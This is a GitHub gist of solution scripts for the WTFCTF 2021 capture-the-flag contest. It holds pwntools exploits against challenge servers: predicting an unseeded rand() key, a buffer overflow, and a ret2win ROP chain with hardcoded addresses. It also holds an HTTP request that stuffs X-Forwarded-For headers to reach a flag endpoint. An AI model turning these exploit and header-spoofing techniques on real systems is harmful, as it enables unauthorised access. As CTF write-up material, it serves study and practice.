@po6ix
Last active June 5, 2021 23:57
WTFCTF 2021
  • pwn
    • k3Y
    • MoM5m4g1c
    • Pr1ns0n_Br34k
  • web
    • masker
from ctypes import *
from pwn import *
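# k3Y: the server's secret is derived from glibc rand() that is never seeded,
# so rand() starts from the default seed (equivalent to srand(1)) and the first
# value it returns is reproducible on any host that also loads glibc. Mirror
# that call locally instead of guessing.
libc = CDLL("libc.so.6")
# p = process('./chall')
p = remote('20.42.99.115', 3143)
try:
    # Expected key = first unseeded rand() masked with the challenge constant.
    # Presumably the binary applies the same XOR before comparing — confirm
    # against its disassembly if the key is rejected.
    key = libc.rand() ^ 0xACEDFACE
    # NOTE(review): the XOR result can exceed INT_MAX; whether the server
    # parses the decimal as signed or unsigned is not visible here.
    # Send explicit bytes so the wire format does not depend on pwntools'
    # str-encoding behaviour.
    p.sendline(str(key).encode())
    print(p.recvall(timeout=1))
finally:
    # Close the socket even if recvall/sendline raises (the original only
    # closed on the success path).
    p.close()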
GET /getFlag HTTP/1.1
Host: wtfmasker.herokuapp.com
Cache-Control: max-age=0
Sec-Ch-Ua: " Not;A Brand";v="99", "Google Chrome";v="91", "Chromium";v="91"
Sec-Ch-Ua-Mobile: ?0
Upgrade-Insecure-Requests: 1
Dnt: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
x-forwarded-for: 6.9.6.9, 6.9.6.9, 6.9.6.9, 6.9.6.9, 6.9.6.9, 6.9.6.9, 6.9.6.9, 6.9.6.9, 6.9.6.9, 6.9.6.9, 6.9.6.9, 6.9.6.9, 6.9.6.9, 6.9.6.9, 6.9.6.9, 6.9.6.9, 6.9.6.9, 6.9.6.9, 6.9.6.9, 6.9.6.9, 6.9.6.9, 6.9.6.9, 6.9.6.9
x-forwarded-for: , 6.9.6.9, 6.9.6.9, 6.9.6.9, 6.9.6.9, 6.9.6.9, 6.9.6.9, 6.9.6.9, 6.9.6.9, 6.9.6.9, 6.9.6.9, 6.9.6.9, 6.9.6.9, 6.9.6.9, 6.9.6.9, 6.9.6.9, 6.9.6.9, 6.9.6.9, 6.9.6.9, 6.9.6.9, 6.9.6.9, 6.9.6.9, 6.9.6.9, 6.9.6.9
Referer: https://wtfctf.wearemist.in/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,ko-KR;q=0.8,ko;q=0.7
If-None-Match: W/"1ba-179360a0180"
If-Modified-Since: Tue, 04 May 2021 06:21:36 GMT
Connection: close
from pwn import *
# MoM5m4g1c: a single oversized line of 0x01 bytes is enough to reach the
# shell/flag path on the remote service.
p = remote('20.42.99.115', 3000)
# 150 bytes of 0x01 — presumably overruns the target buffer and lands on the
# value the binary checks; both the byte value and the length were tuned for
# this challenge binary, so confirm them against the disassembly before reuse.
payload = b'\x01' * 150
p.sendline(payload)
# Hand the connection to the user once the payload is in.
p.interactive()
from pwn import *
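# Pr1ns0n_Br34k: ret2win-style stack smash. The paste lost the indentation of
# the prompt-skipping loop (an IndentationError as written); the body below is
# the same sequence of sends with consistent bytes arguments.
# p = process('./prison')
p = remote('20.42.99.115', 3213)

# Skip the five ':'-terminated prompts that precede the vulnerable read; any
# one-character answer will do, and the loop index is unused.
for _ in range(5):
    p.sendafter(b':', b'x')

# Absolute 0x40xxxx addresses are only usable because the binary appears to be
# non-PIE (addresses in the default 0x400000 image range) — confirm with
# checksec before reusing against another build.
payload = p64(0x4011B2) * 18  # flag()
payload += b'c' * 0x18
payload += p64(0x401488)  # pop r14; pop r15; ret
payload += b'd' * 0x40
# NOTE(review): the offsets (18 copies of flag(), 0x18 and 0x40 bytes of
# padding, the pop/pop/ret gadget) encode this binary's frame layout; the gist
# does not show how they were derived, so re-derive them from the disassembly
# if the target changes.
p.sendlineafter(b':', payload)
p.interactive()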